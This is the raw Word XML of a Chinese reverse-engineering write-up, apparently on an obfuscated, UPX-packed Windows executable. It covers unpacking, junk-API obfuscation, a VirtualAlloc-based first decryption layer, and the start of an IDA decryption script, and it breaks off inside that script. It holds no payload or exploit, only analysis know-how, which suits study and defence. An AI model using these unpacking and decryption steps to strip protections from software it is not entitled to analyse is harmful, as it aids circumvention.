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55547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B6B" w:rsidRDefault="00FB0B6B">
          <w:pPr>
            <w:pStyle w:val="TOC"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00EF13D0" w:rsidRDefault="00FB0B6B">
          <w:pPr>
            <w:pStyle w:val="30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51363" w:history="1">
            <w:r w:rsidR="00EF13D0" w:rsidRPr="00A06BCE">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>准备工作</w:t>
            </w:r>
            <w:r w:rsidR="00EF13D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EF13D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EF13D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc467351363 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EF13D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EF13D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00EF13D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00EF13D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00EF13D0" w:rsidRDefault="00EF13D0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351364" w:history="1">
            <w:r w:rsidRPr="00A06BCE">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>解密第一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3D0" w:rsidRDefault="00EF13D0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351365" w:history="1">
            <w:r w:rsidRPr="00A06BCE">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>解密第二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3D0" w:rsidRDefault="00EF13D0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351366" w:history="1">
            <w:r w:rsidRPr="00A06BCE">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>解密第三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3D0" w:rsidRDefault="00EF13D0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7351367" w:history="1">
            <w:r w:rsidRPr="00A06BCE">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>内嵌</w:t>
            </w:r>
            <w:r w:rsidRPr="00A06BCE">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>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B6B" w:rsidRDefault="00FB0B6B">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00FB0B6B" w:rsidRDefault="00FB0B6B" w:rsidP="00134501"/>
    <w:p w:rsidR="004B2376" w:rsidRDefault="004B2376" w:rsidP="004B2376"/>
    <w:p w:rsidR="004B2376" w:rsidRDefault="004B2376" w:rsidP="004B2376"/>
    <w:p w:rsidR="004B2376" w:rsidRDefault="004B2376" w:rsidP="004B2376"/>
    <w:p w:rsidR="004B2376" w:rsidRDefault="004B2376" w:rsidP="004B2376"/>
    <w:p w:rsidR="004B2376" w:rsidRDefault="004B2376" w:rsidP="004B2376">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="004B2376" w:rsidRDefault="004B2376" w:rsidP="004B2376"/>
    <w:p w:rsidR="004B2376" w:rsidRPr="004B2376" w:rsidRDefault="004B2376" w:rsidP="004B2376"/>
    <w:p w:rsidR="00FB0B6B" w:rsidRPr="00FB0B6B" w:rsidRDefault="00FB0B6B" w:rsidP="00FB0B6B">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc467351363"/>
      <w:r w:rsidRPr="00FB0B6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>准备工作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00FB0B6B" w:rsidRDefault="00FB0B6B" w:rsidP="00FB0B6B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制数据拷贝到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinHex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>生成</w:t>
      </w:r>
      <w:r w:rsidR="00FC32F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
      <w:r w:rsidR="00FC32F9">
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00FC32F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC4147" w:rsidRDefault="00EC4147" w:rsidP="00FB0B6B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC4147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pe</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节名发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>upx</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>壳，直接用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>upx</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脱壳机，得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>82k</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC4147" w:rsidRDefault="00EC4147" w:rsidP="00FB0B6B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前为止能看到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC4147" w:rsidRDefault="00EC4147" w:rsidP="00EC4147">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>.code  00401000 0040A000 R . X . L para 0001 public CODE 32 0000 0000 0002 FFFFFFFF FFFFFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC4147" w:rsidRDefault="00EC4147" w:rsidP="00EC4147">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>.data  0040A000 00414000 R . . . L para 0002 public DATA 32 0000 0000 0002 FFFFFFFF FFFFFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC4147" w:rsidRDefault="00EC4147" w:rsidP="00EC4147">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>.rdata 00414000 00416000 R . . . L para 0003 public DATA 32 0000 0000 0002 FFFFFFFF FFFFFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2376" w:rsidRPr="00EC4147" w:rsidRDefault="004B2376" w:rsidP="00EC4147">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FB0B6B" w:rsidRPr="00FB0B6B" w:rsidRDefault="00FB0B6B" w:rsidP="00FB0B6B">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc467351364"/>
      <w:r w:rsidRPr="00FB0B6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解密第一层</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00623840" w:rsidRDefault="00BB454B" w:rsidP="00DE478E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析的所有函数都</w:t>
      </w:r>
      <w:r w:rsidR="00B04C7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有意义的空函数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混淆形式有：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB454B" w:rsidRDefault="00BB454B">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任意用无效参数调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r w:rsidR="004F67EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（因此导入表也基本是无用的</w:t>
      </w:r>
      <w:r w:rsidR="004F67EC">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00173E74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00173E74">
        <w:t>甚至</w:t>
      </w:r>
      <w:r w:rsidR="00173E74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在检测</w:t>
      </w:r>
      <w:r w:rsidR="00173E74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r w:rsidR="00173E74">
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidR="00173E74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否对应目标错误值</w:t>
      </w:r>
      <w:r w:rsidR="00DF62FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逻辑</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB454B" w:rsidRDefault="00BB454B" w:rsidP="00BB454B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="665BE17C" wp14:editId="6DE63B18">
            <wp:extent cx="4989638" cy="1719281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618" cy="17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76" w:rsidRDefault="004B2376" w:rsidP="004B23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B454B" w:rsidRDefault="00BB454B">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任意构造函数调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB454B" w:rsidRDefault="00BB454B" w:rsidP="00BB454B">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A97A9D1" wp14:editId="3BF9F823">
            <wp:extent cx="4214363" cy="16070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024" cy="16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76" w:rsidRDefault="004B2376" w:rsidP="004B2376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B04C7D" w:rsidRDefault="00B04C7D" w:rsidP="00BB454B">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入口函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无返回</w:t>
      </w:r>
      <w:r w:rsidR="004B2376">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="004B2376">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里有玄机</w:t>
      </w:r>
      <w:r w:rsidR="004B2376">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04C7D" w:rsidRDefault="00B04C7D" w:rsidP="00BB454B">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CA0A08B" wp14:editId="75DE5EE8">
            <wp:extent cx="5037826" cy="307813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627" cy="30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76" w:rsidRDefault="004B2376" w:rsidP="004B2376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B04C7D" w:rsidRDefault="00B04C7D" w:rsidP="00BB454B">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后一个有效函数是</w:t>
      </w:r>
      <w:r w:rsidRPr="00B04C7D">
        <w:t>sub_40724D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里，</w:t>
      </w:r>
      <w:r>
        <w:t>后面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为无效数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其实为真正代码经过加密了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B95D57" w:rsidRDefault="00B95D57" w:rsidP="00E64C9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="226C6431" wp14:editId="54700E70">
            <wp:extent cx="6543733" cy="413205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2005" cy="41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76" w:rsidRDefault="004B2376" w:rsidP="004B237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ED6A5F" w:rsidRDefault="005043F3" w:rsidP="00ED6A5F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="005043F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>整个代码只有</w:t>
      </w:r>
      <w:r w:rsidRPr="005043F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>j_VirtualAlloc</w:t>
      </w:r>
      <w:r w:rsidRPr="005043F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的参数调用有意义的，返回分配的</w:t>
      </w:r>
      <w:r w:rsidRPr="005043F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0xf000</w:t>
      </w:r>
      <w:r w:rsidRPr="005043F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节内存地址</w:t>
      </w:r>
      <w:r w:rsidR="00ED6A5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00ED6A5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假定</w:t>
      </w:r>
      <w:r w:rsidR="00ED6A5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x230000)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00B04C7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每个函数调用最后会有</w:t>
      </w:r>
      <w:r w:rsidR="00B04C7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidR="00B04C7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，要从</w:t>
      </w:r>
      <w:r w:rsidR="00B04C7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidR="00ED6A5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟下去</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED6A5F" w:rsidRDefault="00ED6A5F" w:rsidP="007D6E16">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58C0EAE0" wp14:editId="324165D7">
            <wp:extent cx="4929097" cy="2716323"/>
            <wp:effectExtent l="0" t="0" r="508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317" cy="27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76" w:rsidRDefault="004B2376" w:rsidP="004B23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B454B" w:rsidRDefault="00ED6A5F" w:rsidP="00ED6A5F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上图中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x2CA9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是相对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分配地址的偏移，</w:t>
      </w:r>
      <w:r>
        <w:t>其实是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r w:rsidR="00157C77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次解密结果的入口处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x232CA9)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00EC4147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下图是</w:t>
      </w:r>
      <w:r w:rsidR="004B2376">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对这段内存</w:t>
      </w:r>
      <w:r w:rsidR="004B2376">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="004B2376">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假定</w:t>
      </w:r>
      <w:r w:rsidR="004B2376">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x230000~0x23f000)</w:t>
      </w:r>
      <w:r w:rsidR="004B2376">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的解密</w:t>
      </w:r>
      <w:r w:rsidR="002B7EF2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="002B7EF2">
        <w:t>而</w:t>
      </w:r>
      <w:r w:rsidR="002B7EF2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用的源数据恰好是无法正常反汇编的主函数那里</w:t>
      </w:r>
      <w:r w:rsidR="002B7EF2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="002B7EF2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidR="002B7EF2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="0062471A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B7CFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="0062471A">
        <w:t>0x40</w:t>
      </w:r>
      <w:r w:rsidR="0039634E">
        <w:t>1F46</w:t>
      </w:r>
      <w:r w:rsidR="002B7EF2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="002B7EF2">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="002B7EF2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidR="002B7EF2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidR="002B7EF2">
        <w:t xml:space="preserve"> sub_4083E2</w:t>
      </w:r>
      <w:r w:rsidR="002B7EF2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候入栈</w:t>
      </w:r>
      <w:r w:rsidR="0062471A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C0530B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00C0530B">
        <w:t>要跟踪</w:t>
      </w:r>
      <w:r w:rsidR="00C0530B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新</w:t>
      </w:r>
      <w:r w:rsidR="00157C77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00C0530B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="00C0530B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>走向可以直接下内存断点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04C7D" w:rsidRDefault="000F5BDB" w:rsidP="00BB454B">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="114A4B4F" wp14:editId="51D93EEB">
            <wp:extent cx="4342658" cy="2743309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8" cy="27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9B" w:rsidRPr="00B04C7D" w:rsidRDefault="004B2376" w:rsidP="00D433D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3C651B" w:rsidRDefault="00DD5E37">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>0x230000,0x23f000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内存做解密操作，因此在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ida</w:t>
      </w:r>
      <w:r w:rsidR="0039634E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中增加一个</w:t>
      </w:r>
      <w:r w:rsidR="0039634E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Segment(</w:t>
      </w:r>
      <w:r w:rsidR="0039634E">
        <w:t>0x230000~0x23f000</w:t>
      </w:r>
      <w:r w:rsidR="0039634E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0039634E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来模拟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>使用脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解密：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C651B" w:rsidRDefault="003C651B" w:rsidP="003C651B">
      <w:r>
        <w:t>dstaddr = 0x230000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C651B" w:rsidRDefault="003C651B" w:rsidP="003C651B">
      <w:r>
        <w:t>srcaddr = 0x401F44</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C651B" w:rsidRDefault="003C651B" w:rsidP="003C651B">
      <w:r>
        <w:t>for off in range(0, 0xf000):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C651B" w:rsidRDefault="003C651B" w:rsidP="003C651B">
